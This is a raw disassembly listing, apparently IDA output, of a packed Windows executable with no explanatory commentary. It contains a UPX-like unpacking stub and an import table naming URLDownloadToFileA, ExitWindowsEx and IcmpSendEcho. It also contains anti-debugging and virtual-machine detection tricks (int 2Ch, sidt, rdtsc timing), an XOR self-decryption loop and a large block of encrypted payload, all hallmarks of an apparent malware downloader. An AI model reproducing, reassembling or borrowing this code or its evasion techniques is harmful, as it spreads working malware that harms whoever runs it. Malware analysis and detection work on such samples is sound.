		dd 10000000h, 3	dup(0)
		dd 200000h, 722E6000h, 61746164h, 9B00000h, 40000000h
		dd 10000000h, 40000000h, 3 dup(0)
		dd 400000h, 642E4000h, 617461h,	26C80000h, 50000000h, 20000000h
		dd 50000000h, 3	dup(0)
		dd 400000h, 7000C000h, 43F80000h, 2 dup(755E0000h), 8DD71262h
		dd 0CECF74AAh, 0BA612C8h, 0C097F36Bh, 91ED3F6Ah, 5E1AC6C0h
		dd 0D97BDC9Dh, 70B7FFFEh, 5412C707h, 9ABDDF12h,	9A78485Ah
		dd 0FF50AA58h, 850D9112h, 7B5ADFFFh, 0E9B7858h,	63120853h
		dd 5F1A6E12h, 0F3491297h, 37DAC09Ah, 0ED71DCD8h, 60940C6Eh
		dd 0C365CE66h, 0FFFEEF68h, 75F812F9h, 0F36D12DDh, 9D10C089h
		dd 0C9627B17h, 0F398F300h, 0BDB2FF9Bh, 216D226Dh, 2A1C710h
		dd 5EFFD9A5h, 9898B5DFh, 0FEC5BFFBh, 0C989DE14h, 2159AACFh
		dd 0A5CE1403h, 0F4FA9B5Eh, 0D9CB99FDh, 7EDFB9BBh, 9E5E71CEh
		dd 5E9B499Bh, 0FA9DDEh,	13CACE4Ch, 6EBADFDAh, 1B650361h
		dd 1C353275h, 0C860EC59h, 0CBEDFF78h, 0C34B11DFh, 777B32C0h
		dd 669A715Ah, 0EDFCDE00h, 0FAF6EBC9h, 6F7BBFD8h, 0EBFDFDFFh
		dd 99EAEAFCh, 0EDF805DAh, 0D80D11FCh, 0F0E1DC99h, 0DDBFDBEDh
		dd 13F1CDDCh, 4F6D563h,	0EBFBF0D5h, 17E0EBF8h, 0BB797FEEh
		dd 0C6ABEAFDh, 6399ABAAh, 0F229CAD8h, 0F6FAEDFCh, 0FAFCF7F7h
		dd 6FB58D24h, 0F6F5FADFh, 99143AEAh, 0D23F2057h, 0B72D20C8h
		dd 0C2A88h, 81268002h, 0C8C28F7h, 2F84BF07h, 4DD137F1h
		dd 642079D2h, 61636C6Ch, 745C65C2h, 0D1BFA37Dh,	2E347466h
		dd 20657865h, 5C732877h, 0E9987673h, 6F14B12Bh,	0DE0A10D3h
		dd 0F3D01C13h, 4C4C44FFh, 54534F48h, 4558452Eh,	0EEF9149Ah
		dd 544985BDh, 500B5338h, 68637461h, 0C5B656F7h,	495A7241h
		dd 0EDFFB300h, 3D3D9F2Fh, 0D2CB00CAh, 0DAD3D3D2h, 2FDCDBDAh
		dd 62E607D6h, 47773463h, 68525445h, 20FE2D8Bh, 50545448h
		dd 6031D32Fh, 6F46A341h, 7495D054h, 29E8203Ah, 85A8DB07h
		dd 0A2C0980h, 716D2D78h, 6278F2D8h, 10707469h, 1667AF6Ah
		dd 0B8767DBh, 2F2A0C70h, 0B355412Ah, 0F6DD5B6Fh, 14412D72h
		dd 0ED4D456Eh, 2F616F69h, 0E154AD34h, 28202E42h, 0FEBE350Eh
		dd 0B446A16Dh, 53183B06h, 35204549h, 0BF17352Eh, 5709DB51h
		dd 73773A94h, 0FC383920h, 5CD7B685h, 0C3359948h, 0DA67430Bh
		dd 6EA190CDh, 4B116E30h, 15A89465h, 7B53D46Ah, 0FA35177Fh
		dd 0DF0467B2h, 20492000h, 0D6EA5B7Ah, 6D2019BDh, 766E179h
		dd 62222026h, 6D42B90Bh, 7E293A7Bh, 765F2000h, 2EC76E78h
		dd 584315B5h, 4E116E61h, 6563546Fh, 5D0B7368h, 34DC3220h
		dd 4220A032h, 605B36EFh, 6CBB416Dh, 0CC8F3866h,	6FF6EDB5h
		dd 7A437272h, 76677D68h, 88686F36h, 0B1480C22h,	0EA982D74h
		dd 2F3A765Eh, 0AE6EBE2Fh, 85B96D80h, 0CA56A856h, 712E8C38h
		dd 93FB51BDh, 2F362F16h, 5352F39h, 3764375Ah, 1BFC2FF5h
		dd 62662D59h, 342D6137h, 622D39B7h, 2D366531h, 2AB7D1B0h
		dd 36627A3Fh, 326C6632h, 0A105DFC2h, 30980C27h,	38424B2Dh
		dd 0C0153332h, 8B76F0Eh, 4B253878h, 73B1524Fh, 0A5BDB52Fh
		dd 662F386Fh, 37C83805h, 72FD3631h, 2D31FDD9h, 33626438h
		dd 35346673h, 35613037h, 2BE46236h, 3904BDACh, 73803864h
		dd 0F6544843h, 322266B7h, 31380531h, 66643063h,	5ADED53Eh
		dd 323737FBh, 4C037362h, 0F6323139h, 3D4DB590h,	65536254h
		dd 0DF731839h, 5376113Ch, 312F30E7h, 64663130h,	2F6B6D64h
		dd 663034FFh, 6366652Dh, 64333335h, 0EC321CF1h,	856B6DB0h
		dd 65175C34h, 73350534h, 0AF90891Bh, 0EE554E45h, 742B6D33h
		dd 33657577h, 0C5325C31h, 0FF4735EAh, 7C685706h, 335B73DAh
		dd 65313865h, 8353462h,	35E49C21h, 50586634h, 639B0CDh
		dd 47335B42h, 43723641h, 33ED0D6Bh, 355B4864h, 5DB63730h
		dd 6361F280h, 32336932h, 840733ECh, 38D8461Dh, 0C773CD73h
		dd 615DD68Eh, 2B033501h, 0BB433064h, 3379470Eh,	44383361h
		dd 35EC344Dh, 860AC265h, 6564590Bh, 0EB73EE02h,	53B90A18h
		dd 5624339h, 46ED6B5Ah,	0D666329h, 35086C64h, 0E7EB4075h
		dd 2D6D7338h, 0AC233539h, 1D252B70h, 73F16633h,	92D03FFh
		dd 207100CDh, 2520692Dh, 23C2073h, 6567F203h, 6E202074h
		dd 80435653h, 2F96CAC0h, 8062D629h, 0CF9E20C0h,	0EB2DBE24h
		dd 6B2677D6h, 5338A920h, 0F0726168h, 2BDD80D6h,	6C0067h
		dd 435444ECh, 4CD0246Fh, 13FA4207h, 256EF6Ah, 49572BC6h
		dd 0A158534Eh, 7AD03580h, 41770046h, 6E02B258h,	4B60F372h
		dd 0B6CB2C1Bh, 6E2DB71Bh, 717A6F02h, 18DB5D6Dh,	762A532Fh
		dd 6B5F50ECh, 9ED5A36Eh, 78797358h, 633E2CECh, 817B605Ah
		dd 6F65BC54h, 0F36FE875h, 31EDB475h, 6365EDD8h,	55617254h
		dd 6ED83566h, 752D2C1Dh, 750A7309h, 3046136Ch, 1D36F730h
		dd 0A31F6144h, 96E08604h, 0D0CFE320h, 370425C0h, 4D0FE31Fh
		dd 0B9706020h, 0E706EC6Ah, 371B6C1Ah, 4710011Ch, 0BBC0CDE0h
		dd 542DEF74h, 0A9E7079h, 6D2F7478h, 4E95976Fh, 67046C17h
		dd 33196874h, 683F6FC2h, 58590641h, 45530001h, 0ADC55241h
		dd 0C2835ED0h, 0CE7DECBBh, 1F0AD685h, 0F683504Bh, 0EC9DC52Eh
		dd 4F136DB6h, 452257BCh, 555CA05Ch, 0B6850618h,	3A4F61C0h
		dd 0BC61D879h, 500941D1h, 455C32h, 0C845AF33h, 0A793114h
		dd 357496AFh, 0CB6E4F35h, 40266C60h, 634B6E1Ch,	0C7C1D766h
		dd 8E6769C2h, 0C6204E61h, 366E4575h, 20518EC7h,	6D2B1044h
		dd 30205049h, 1C970D19h, 2E9D7264h, 580F2507h, 2D70DB04h
		dd 5F2B0D64h, 0C4B0754Dh, 7B480C31h, 617A736Dh,	8360A970h
		dd 0D10C00AEh, 96893131h, 9B439212h, 6B276E34h,	24411EDh
		dd 492DDA0Eh, 0D68518BDh, 0B41A5349h, 422001D3h, 4030C80h
		dd 88580101h, 42A8CB00h, 0A5FAE052h, 0FC0B1432h, 74654701h
		dd 0FB60054Ch, 724544ADh, 0D726F72h, 4A00A549h,	6C72FFC1h
		dd 656B636Fh, 63654464h, 0B7EE6152h, 1123BBE6h,	416C6162h
		dd 400C186Ch, 46DB6EDBh, 4F0B651Bh, 38501F70h, 1CC6005Fh
		dd 0B0464964h, 72747441h, 0F6CB256Fh, 74756269h, 27534113h
		dd 0F6FB9B82h, 75646F4Dh, 6E614815h, 55111B64h,	0F7B6D06Eh
		dd 695693B7h, 664F7765h, 5D43102Dh, 2AAFB09h, 9441F676h
		dd 0C936B25Eh, 104C6E49h, 22C0B93h, 5D92CDF4h, 330BE156h
		dd 450F6701h, 24437878h, 1FD8C03Dh, 454FB358h, 950434Dh
		dd 0DDA17B53h, 66F7574Eh, 43149C61h, 0BDAB4449h, 97017F7Dh
		dd 0AD6D614Eh, 696D5254h, 9ED0B06Eh, 57459FCCh,	3EE66961h
		dd 0B780B553h, 4F25E202h, 36486A62h, 0C3C20D7Bh, 0A1783539h
		dd 3CCDB096h, 8B6D6954h, 0DD158069h, 0D9B5B7B3h, 0F7D3752Ch
		dd 64066854h, 0C825B5Eh, 670B13Ch, 5C3B2FD7h, 6F733E02h
		dd 7269A619h, 73764DBFh, 41797466h, 68216F36h, 33706C65h
		dd 0DBEE60B5h, 709D5332h, 506F6873h, 1C2B1267h,	789A158h
		dd 6F594E0Fh, 0C2C20B36h, 4586733Dh, 82B5ACD4h,	1508554Bh
		dd 6DB7C20Fh, 0ED00F152h, 2E68250Ch, 7D6567h, 43930167h
		dd 0A7E432E9h, 512CDB6Ch, 15791175h, 72617453h,	4B377B74h
		dd 700F5116h, 69676552h, 31B671CAh, 233672ACh, 85728B6Ch
		dd 399B05DDh, 75744417h, 50134C73h, 442BBE82h, 21651E80h
		dd 7F2E3D9Bh, 86FC9330h, 0BF417604h, 6A644141h,	31747375h
		dd 62A34059h, 46127377h, 53DF9E02h, 6872DF43h, 5961D86Ch
		dd 0BA0E3FD0h, 0D9B2DCFEh, 10E32133h, 9079654Bh, 823DEC5Ch
		dd 3D0F330Eh, 9623DB92h, 7581C779h, 61E69F70h, 75325663h
		dd 4950FA7Ch, 12F66963h
		dd 0B3706DC2h, 46389410h, 0F37B5B0h, 9D451B7Ch,	0B72CF1CDh
		dd 0F0010337h, 68057265h, 5FF4E19Dh, 8E706358h,	5F5F0C72h
		dd 8B476EB5h, 6772C80Ah, 0CE085FE9h, 22AEB42Dh,	70A6D18h
		dd 0FB070272h, 72B9BFFEh, 3F3F0664h, 41594032h,	49584150h
		dd 70365A40h, 0B6F68602h, 76652C58h, 116B8B0Eh,	3773433Eh
		dd 61578882h, 6082364Ah, 64665FEDh, 6D392EC4h, 95C15A36h
		dd 0D9AF9D44h, 0CC1B66E6h, 1262C510h, 0BD1D661Fh, 4B362DB7h
		dd 7411703Eh, 770F7079h, 0B5A22EC6h, 13685FC7h,	0A3771133h
		dd 39590215h, 1D7066E5h, 0BDD35CF6h, 58339DD3h,	2CB19D9Eh
		dd 476D5C18h, 0E00086Dh, 0D9BC1598h, 5255319Ch,	0E99F444Ch
		dd 6A518374h, 481C19D2h, 9B5B390h, 170AE0C1h, 0B6596524h
		dd 17FF504Dh, 0C390402h, 96596596h, 10131534h, 96590903h
		dd 74025965h, 0F208010Dh, 73659604h, 50710B0Eh,	92FE8045h
		dd 3014CFFh, 8200800h, 0B010F9Ah, 41660601h, 4052C6CFh
		dd 0BE2FCC13h, 0F7D9E764h, 0F10040Fh, 5B070004h, 17B67406h
		dd 0CB0C3180h, 10EC0DE0h, 0BA360607h, 0B4CB2101h, 0A4A2A041h
		dd 8C2B829h, 85F02E26h,	79DB06Ch, 3090213Ah, 8F052D98h
		dd 2E609501h, 29611072h, 53B9309Bh, 6A0309B0h, 0DEECD3BDh
		dd 3C262E40h, 75026C8h,	94E1B6E5h, 0EB00C027h, 5E0343F8h
		dd 75h,	4800000h, 0FF00h, 3 dup(0)
; ---------------------------------------------------------------------------
		pusha
		mov	esi, offset dword_407000
		lea	edi, [esi-6000h]
		push	edi
		or	ebp, 0FFFFFFFFh
		jmp	short loc_409082
; ---------------------------------------------------------------------------
		align 8


loc_409078:				; CODE XREF: seg001:loc_409089j
		mov	al, [esi]
		inc	esi
		mov	[edi], al
		inc	edi


loc_40907E:				; CODE XREF: seg001:00409116j
					; seg001:0040912Dj
		add	ebx, ebx
		jnz	short loc_409089


loc_409082:				; CODE XREF: seg001:00409070j
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_409089:				; CODE XREF: seg001:00409080j
		jb	short loc_409078
		mov	eax, 1


loc_409090:				; CODE XREF: seg001:0040909Fj
					; seg001:004090AAj
		add	ebx, ebx
		jnz	short loc_40909B
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_40909B:				; CODE XREF: seg001:00409092j
		adc	eax, eax
		add	ebx, ebx
		jnb	short loc_409090
		jnz	short loc_4090AC
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx
		jnb	short loc_409090


loc_4090AC:				; CODE XREF: seg001:004090A1j
		xor	ecx, ecx
		sub	eax, 3
		jb	short loc_4090C0
		shl	eax, 8
		mov	al, [esi]
		inc	esi
		xor	eax, 0FFFFFFFFh
		jz	short loc_409132
		mov	ebp, eax


loc_4090C0:				; CODE XREF: seg001:004090B1j
		add	ebx, ebx
		jnz	short loc_4090CB
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_4090CB:				; CODE XREF: seg001:004090C2j
		adc	ecx, ecx
		add	ebx, ebx
		jnz	short loc_4090D8
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_4090D8:				; CODE XREF: seg001:004090CFj
		adc	ecx, ecx
		jnz	short loc_4090FC
		inc	ecx


loc_4090DD:				; CODE XREF: seg001:004090ECj
					; seg001:004090F7j
		add	ebx, ebx
		jnz	short loc_4090E8
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_4090E8:				; CODE XREF: seg001:004090DFj
		adc	ecx, ecx
		add	ebx, ebx
		jnb	short loc_4090DD
		jnz	short loc_4090F9
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx
		jnb	short loc_4090DD


loc_4090F9:				; CODE XREF: seg001:004090EEj
		add	ecx, 2


loc_4090FC:				; CODE XREF: seg001:004090DAj
		cmp	ebp, 0FFFFF300h
		adc	ecx, 1
		lea	edx, [edi+ebp]
		cmp	ebp, 0FFFFFFFCh
		jbe	short loc_40911C


loc_40910D:				; CODE XREF: seg001:00409114j
		mov	al, [edx]
		inc	edx
		mov	[edi], al
		inc	edi
		dec	ecx
		jnz	short loc_40910D
		jmp	loc_40907E
; ---------------------------------------------------------------------------
		align 4


loc_40911C:				; CODE XREF: seg001:0040910Bj
					; seg001:00409129j
		mov	eax, [edx]
		add	edx, 4
		mov	[edi], eax
		add	edi, 4
		sub	ecx, 4
		ja	short loc_40911C
		add	edi, ecx
		jmp	loc_40907E
; ---------------------------------------------------------------------------


loc_409132:				; CODE XREF: seg001:004090BCj
		pop	esi
		mov	edi, esi
		mov	ecx, 5Dh


loc_40913A:				; CODE XREF: seg001:00409141j
					; seg001:00409146j
		mov	al, [edi]
		inc	edi
		sub	al, 0E8h


loc_40913F:				; CODE XREF: seg001:00409164j
		cmp	al, 1
		ja	short loc_40913A
		cmp	byte ptr [edi],	1
		jnz	short loc_40913A
		mov	eax, [edi]
		mov	bl, [edi+4]
		shr	ax, 8
		rol	eax, 10h
		xchg	al, ah
		sub	eax, edi
		sub	bl, 0E8h
		add	eax, esi
		mov	[edi], eax
		add	edi, 5
		mov	eax, ebx
		loop	loc_40913F
		lea	edi, [esi+7000h]


loc_40916C:				; CODE XREF: seg001:0040918Ej
		mov	eax, [edi]
		or	eax, eax
		jz	short loc_4091B7
		mov	ebx, [edi+4]
		lea	eax, [eax+esi+9000h]
		add	ebx, esi
		push	eax
		add	edi, 8
		call	dword ptr [esi+90A0h]
		xchg	eax, ebp


loc_409189:				; CODE XREF: seg001:004091AFj
		mov	al, [edi]
		inc	edi
		or	al, al
		jz	short loc_40916C
		mov	ecx, edi
		jns	short near ptr loc_40919A+1
		movzx	eax, word ptr [edi]
		inc	edi
		push	eax
		inc	edi


loc_40919A:				; CODE XREF: seg001:00409192j
		mov	ecx, 0AEF24857h
		push	ebp
		call	dword ptr [esi+90A4h]
		or	eax, eax
		jz	short loc_4091B1
		mov	[ebx], eax
		add	ebx, 4
		jmp	short loc_409189
; ---------------------------------------------------------------------------


loc_4091B1:				; CODE XREF: seg001:004091A8j
		call	dword ptr [esi+90A8h]


loc_4091B7:				; CODE XREF: seg001:00409170j
		popa
		jmp	loc_402FCC
; ---------------------------------------------------------------------------
		align 1000h
seg001		ends

; Section 3. (virtual address 0000A000)
; Virtual size			: 00008000 (  32768.)
; Section size in file		: 00008000 (  32768.)
; Offset to raw	data for section: 0000A000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
seg002		segment	para public 'CODE' use32
		assume cs:seg002
		;org 40A000h
		assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
		dd 3 dup(0)
		dd 0A0E0h, 0A0A0h, 3 dup(0)
		dd 0A0EDh, 0A0B0h, 3 dup(0)
		dd 0A0FAh, 0A0B8h, 3 dup(0)
		dd 0A103h, 0A0C0h, 3 dup(0)
		dd 0A10Eh, 0A0C8h, 3 dup(0)
		dd 0A119h, 0A0D0h, 3 dup(0)
		dd 0A124h, 0A0D8h, 5 dup(0)
		dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
		dd 77DD6BF0h, 0
		dd 76D64B79h, 0
		dd 77C39E7Eh, 0
		dd 42D779A3h, 0
		dd 7E45A045h, 0
		dd 71AB2BF4h, 0
		db  4Bh	; K
		db 45h,	52h, 4Eh
		db  45h	; E
		db 4Ch,	33h, 32h
		db  2Eh	; .
		db 44h,	2 dup(4Ch)
		db    0
		db 41h,	44h, 56h
		db  41h	; A
		db 50h,	49h, 33h
		db  32h	; 2
		db 2Eh,	64h, 6Ch
		db  6Ch	; l
		align 2
		dw 4349h
		db  4Dh	; M
		db 50h,	2Eh, 64h
		db  6Ch	; l
		db 6Ch,	0, 4Dh
		db  53h	; S
		db 56h,	43h, 52h
		db  54h	; T
		db 2Eh,	64h, 6Ch
		db  6Ch	; l
		align 2
		dw 7275h
		db  6Ch	; l
		db 6Dh,	6Fh, 6Eh
		db  2Eh	; .
		db 64h,	2 dup(6Ch)
		db    0
		db 55h,	53h, 45h
		db  52h	; R
		db 33h,	32h, 2Eh
		db  64h	; d
		db 2 dup(6Ch), 0
		db  57h	; W
		db 53h,	32h, 5Fh
		db  33h	; 3
		db 32h,	2Eh, 64h
		db  6Ch	; l
		db 6Ch,	2 dup(0)
aLoadlibrarya	db 'LoadLibraryA',0
		align 2
aGetprocaddress	db 'GetProcAddress',0
		align 2
aExitprocess	db 'ExitProcess',0
		align 4
aRegclosekey	db 'RegCloseKey',0
		db    0
		align 2
aIcmpsendecho	db 'IcmpSendEcho',0
		align 4
aExit		db 'exit',0
		align 2
aUrldownloadtof	db 'URLDownloadToFileA',0
		align 2
aExitwindowsex	db 'ExitWindowsEx',0
		dd 398h	dup(0)

; =============== S U B	R O U T	I N E =======================================


		public start

start		proc near
		cld
		call	loc_40B02E
start		endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40B006	proc near		; CODE XREF: seg002:0040B07Dp
		push	ebx
		mov	ecx, 0DA5h
		mov	ebx, edx


loc_40B00E:				; CODE XREF: sub_40B006+13j
		xor	[eax], dx
		lea	eax, [eax+2]
		xchg	dl, dh
		lea	edx, [ebx+edx]
		loop	loc_40B00E
		pop	ebx
		retn
sub_40B006	endp

; ---------------------------------------------------------------------------
		db 0C0h, 60h
; ---------------------------------------------------------------------------


loc_40B01F:				; CODE XREF: seg002:0040B068j
		pop	ebp
		retn
; ---------------------------------------------------------------------------


loc_40B021:				; CODE XREF: seg002:0040B036j
					; seg002:0040B047j
		push	ebp
		mov	eax, 8000h
		xor	ecx, ecx
		jmp	short loc_40B055

; =============== S U B	R O U T	I N E =======================================



sub_40B02B	proc near		; CODE XREF: seg002:0040B04Ap
					; seg002:0040B050p
		rdtsc
		retn
sub_40B02B	endp

; ---------------------------------------------------------------------------


loc_40B02E:				; CODE XREF: start+1p seg002:0040B09Fj
		test	eax, eax
		jnz	short loc_40B03A
		int	2Ch		; Internal routine for MSDOS (IRET)
		test	eax, eax
		jns	short loc_40B021
		jmp	short loc_40B049
; ---------------------------------------------------------------------------


loc_40B03A:				; CODE XREF: seg002:0040B030j
		push	eax
		sidt	fword ptr [esp-2]
		pop	eax
		mov	eax, [eax+6]
		shl	eax, 10h
		jns	short loc_40B021


loc_40B049:				; CODE XREF: seg002:0040B038j
		push	ebp
		call	sub_40B02B	; CODE XREF: seg002:0040B085j
		xchg	eax, ecx
		call	sub_40B02B


loc_40B055:				; CODE XREF: seg002:0040B029j
		sub	eax, ecx
		mov	ebp, [esp+4]
		sub	dword ptr [esp+4], 1FA6h
		sub	eax, 100h
		jnb	short loc_40B01F
		sub	ebp, 301006h
		lea	eax, [ebp+301082h]
		mov	dx, [eax-65h]
		call	sub_40B006
		sub	esp, [eax-55h]	; CODE XREF: seg002:0040B0E1j
		jge	short near ptr loc_40B04A+2
		mov	cl, al
		mov	eax, ds:9C9E5102h
		inc	ebp
		inc	ebx
		mov	ecx, 0AB971EC9h
		and	al, 8Eh
		add	al, 0D4h
		lds	eax, [ebp-1991EB32h]
		jp	short loc_40B02E
		push	edx


loc_40B0A2:				; CODE XREF: seg002:0040B110j
		ficomp	word ptr [esi]
		stosd
		xor	edi, ebp
		or	eax, 0D583500Ch
		inc	edi
		cmp	[edx], ch
		cmp	esp, ds:0AFEA360Bh
		enter	6E2Ah, 0AEh


loc_40B0B9:				; CODE XREF: seg002:0040B0F2j
		mov	edi, 0B218C983h
		inc	edx
		adc	bl, dh
		rep xor	eax, [ebp+20h]
		or	[esi-2], esp
		push	34B174C5h
		insb
		fadd	st(1), st
		cmp	[esi+ebx+453A54ECh], edx
		xchg	eax, edi
		cmp	ah, bl
		xchg	eax, ecx
		xor	ecx, esi
		mov	dh, 0D4h
		db	26h
		pop	esi
		jnb	short near ptr loc_40B082+2
		push	es
		ja	short near ptr loc_40B122+5
		cmp	ebp, 40175420h
		and	[edx+43115DE3h], cl
		jge	short loc_40B0B9
		mov	ch, 5Fh
		jp	short loc_40B10E
		setalc
		xlat
		aam	45h
		xchg	eax, edx
		xchg	eax, esi
		retn
; ---------------------------------------------------------------------------
		db 3Dh
		dd 16BD6E5Dh, 0CBF9784Ch, 3C938CA7h
; ---------------------------------------------------------------------------
		test	al, 50h


loc_40B10E:				; CODE XREF: seg002:0040B0F6j
		or	ebx, edx
		jb	short loc_40B0A2
		pop	esp
		sti
		mov	ebx, 0AF7311FEh
		mov	eax, 99935CD5h
		sar	dword ptr [ebx], 1
		push	ds
		dec	ebp


loc_40B122:				; CODE XREF: seg002:0040B0E4j
		and	[eax-4ACD4549h], ebp
		outsb
		pusha
		enter	7B9Dh, 81h
		inc	ecx
		db	65h
		pusha
		lodsd
		out	0E9h, al
		aas
		cmp	eax, 771D727Dh
		ja	short loc_40B1A4
		xor	eax, [ebx]
		inc	esi
		mov	ds:8004A12Ch, eax
		inc	ebx
		inc	ebp
		xchg	al, [ecx]
		sbb	al, 73h
		push	ss
		lds	eax, [ebp-4C651DFCh]


loc_40B151:				; CODE XREF: seg002:0040B1B2j
		cwde
		push	86D4407h
		cmp	eax, 1EA8E8D8h
		iret
; ---------------------------------------------------------------------------
		db 8Ch,	0B4h, 7Bh
		dd 0EB2A19h, 9A2092FCh,	7899E16Ah, 0DF4DBD9Eh, 0E4D32365h
		dd 9F8EFEE6h, 4BA806CAh, 0EF900F0Fh, 0BFE50192h, 0AA64504Fh
		dd 44CD721Ah, 0F263BF8Ch, 13403BDh, 21A5592Dh, 0D03DF4C4h
		dd 75E50027h, 307531DEh
; ---------------------------------------------------------------------------


loc_40B1A4:				; CODE XREF: seg002:0040B13Aj
		db	67h
		inc	edx
		daa
		mov	dh, 76h
		xchg	ebp, [ebp+59A9BBFAh]
		cmp	[eax-5Bh], edx
		jnz	short loc_40B151
		or	eax, 713A9ADAh
		mov	ebp, 185B31AEh
		sbb	[ebx], dl
		cmp	ebp, [esp+edi*8]
		xchg	eax, ebx
		rcr	al, cl
		cld
		xchg	eax, edi
		dec	esp
		jle	short loc_40B221
		mov	ebp, edi
		lahf
		pop	edi
		xchg	eax, esp
		mov	esi, 0F36E153Fh
		shl	byte ptr [eax+450EC0C5h], 1
		daa
		and	esp, [edx]
		loop	near ptr loc_40B1F1+6
		int	0F6h
		add	esi, [ecx+2DAF6451h]
		cmp	edx, [eax+27A3E34Dh]
		mov	eax, [esp+edx*8]


loc_40B1F1:				; CODE XREF: seg002:0040B1DEj
		test	byte ptr [esi-48E48F58h], 76h
		push	es
		hlt
; ---------------------------------------------------------------------------
		dw 9962h
		dd 0A604ABC4h, 0AF63B5CDh, 4573AA54h, 0D951241Dh, 81C75FA9h
		dd 3BDB4536h, 1BB0AB15h, 6DCD0E64h, 6D7BD12Ch
		db 67h
; ---------------------------------------------------------------------------


loc_40B221:				; CODE XREF: seg002:0040B1C9j
		jg	short near ptr loc_40B230+2
		db	2Eh
		test	eax, 810EB550h
		adc	eax, 0B2AFEDA9h
		in	eax, 7Ah


loc_40B230:				; CODE XREF: seg002:loc_40B221j
					; seg002:0040B259j
		sar	byte ptr [eax-90EA66Dh], 1
		mov	dl, 0D2h
		jp	short loc_40B24D
		sal	dword ptr [ebx+32h], cl
		retf
; ---------------------------------------------------------------------------
		dw 7361h
		dd 36156579h, 0FB279B3h, 9F579796h
		db 0B5h
; ---------------------------------------------------------------------------


loc_40B24D:				; CODE XREF: seg002:0040B238j
		call	near ptr 0DD16C862h
		cwde
		pop	ebp
		idiv	dword ptr [ecx]
		push	eax
		push	esp
		dec	edi
		jnb	short near ptr loc_40B230+3
		sub	[eax+3Bh], dl
		cli
		cdq
		pop	eax
		movsb
		mov	ds, word ptr [eax+52h]
		dec	esp
		cmp	al, 0B2h
		nop
		popf
		pop	esp
		sti
		inc	esp
		sub	ebx, [edi+76DEEC37h]
		cmp	ch, bh
; ---------------------------------------------------------------------------
		db 0FEh, 0BEh, 0B7h
		dd 7EDF1DB4h, 7C594054h, 3F2B0B55h, 0D16EEB15h,	0C19248A1h
		dd 0F867E41h, 4BA3E3D3h, 64C68980h, 84E3CD24h, 0F1484644h
		dd 0C66B2B21h, 0CB551D79h, 0BDE4A997h, 29B9DE76h, 0F72420DAh
		dd 6AFA2673h, 6278269Bh, 0AB0C4E8Eh, 0E084D0E8h, 0E24E8EBCh
		dd 0E6DF629h, 520A44CEh, 0AFAFDFC3h, 0F55F1160h, 90C11A09h
		dd 9A2BEFD1h, 2DCC7341h, 745B9492h, 1475B789h, 1904505Fh
		dd 264AF5C5h, 0F0539917h, 17F7071Dh, 8733DEEBh,	0D8C68677h
		dd 0E2DD9598h, 917BBBBBh, 0BB75A5Fh, 5DCB04FBh,	57519993h
		dd 217C3D0Ch, 0BD2E75D1h, 0DE3F8082h, 0FE9C2791h, 0AD0AC1BFh
		dd 4191CD65h, 103D1BE2h, 1B66AC20h, 2304746Ah, 0F30EFFDFh
		dd 0E4B97983h, 0DEE0A8A4h, 0CE87C7C4h, 47A7E600h, 4B37B58Ah
		dd 48622917h, 71FC4A2Dh, 4A2F1B97h, 0AA268F68h,	613A54A9h
		dd 0A195A7CBh, 7DB87A59h, 6DD2B70Dh, 89622F2Dh,	51EFAE00h
		dd 429A1791h, 0F052DF8Bh, 0BA15B3B0h, 9997945Ch, 351F17C0h
		dd 0F82FF6B8h, 0FBF55FE7h, 0B4163607h, 0D55DBBFFh, 0F6325C1Eh
		dd 1779B9DEh, 69D9B3DFh, 9B793AAh, 55538FE6h, 1AA33B09h
		dd 0EE741C9Dh, 503D7D1Ah, 775EF44Fh, 777BD570h,	6C9DB5DDh
		dd 0BD7FF94h, 15E0207Fh, 5F6B103Fh, 4CB79D30h, 0BD43B3ADh
		dd 0C9B21FBh, 2485F947h, 451169E4h, 0DCC53515h,	85E62E30h
		dd 3F4A8CEh, 0D72885E7h, 6DC489B7h, 95ABEAEh, 0BF072A36h
		dd 4B9AF3B8h, 2A5EF459h, 63EC1C07h, 0AC0D4D5Dh,	0A6410120h
		dd 9C1FFFF8h, 6319C6C7h, 66F5B7AAh, 34C59C91h, 8E811150h
		dd 0A1D9EBA4h, 6F96DA51h, 83344459h, 9E75FFC7h,	80E3494Bh
		dd 0B396E6F9h, 68C3A936h, 21D57D81h, 0FD2CB361h, 0A9F10B56h
		dd 8A3A7A78h, 983EDFFCh, 692CDBCFh, 50F5AAB2h, 5DD99B99h
		dd 0A048E24Bh, 16FE0E16h, 0E8490999h, 2017D62Eh, 304DD80Ah
		dd 314542C0h, 8F341EB6h, 8C23229h, 7DE14922h, 932841D7h
		dd 0C50DDC63h, 0CED18684h, 226B2E44h, 0B2789092h, 4897CBB6h
		dd 0CD4BFE3Bh, 88D905C5h, 565D1E48h, 0FA073EFCh, 9F8C098Ah
		dd 0F2EEEBF7h, 0D263BFC8h, 24A5C999h, 91E4640Eh, 0BEC362BBh
		dd 0DBD0D54Eh, 25D9E2B3h, 0C2529294h, 22902278h, 1F7E56EBh
		dd 7CC6F3C3h, 6434D595h, 0C0A53534h, 0E5470004h, 43C82425h
		dd 0F768B36Bh, 6C207932h, 1DED26D7h, 0B73C76F1h, 92DA2A36h
		dd 6504C656h, 7689A309h, 373D4D50h, 0D59A1F04h,	497FBFBCh
		dd 14524A21h, 0F540FFCFh, 80D00BEDh, 5EFBAFA9h,	0C222629Eh
		dd 0D0198382h, 5535F56Ah, 2585AC95h, 822FE4E1h,	6AAF5557h
		dd 45B4E2ADh, 0F3712210h, 37C88067h, 7CC47677h,	0A5ABFE5h
		dd 7BDB9B98h, 677B7F14h, 0A8480B3Ch, 7367EF0Ch,	0AD551514h
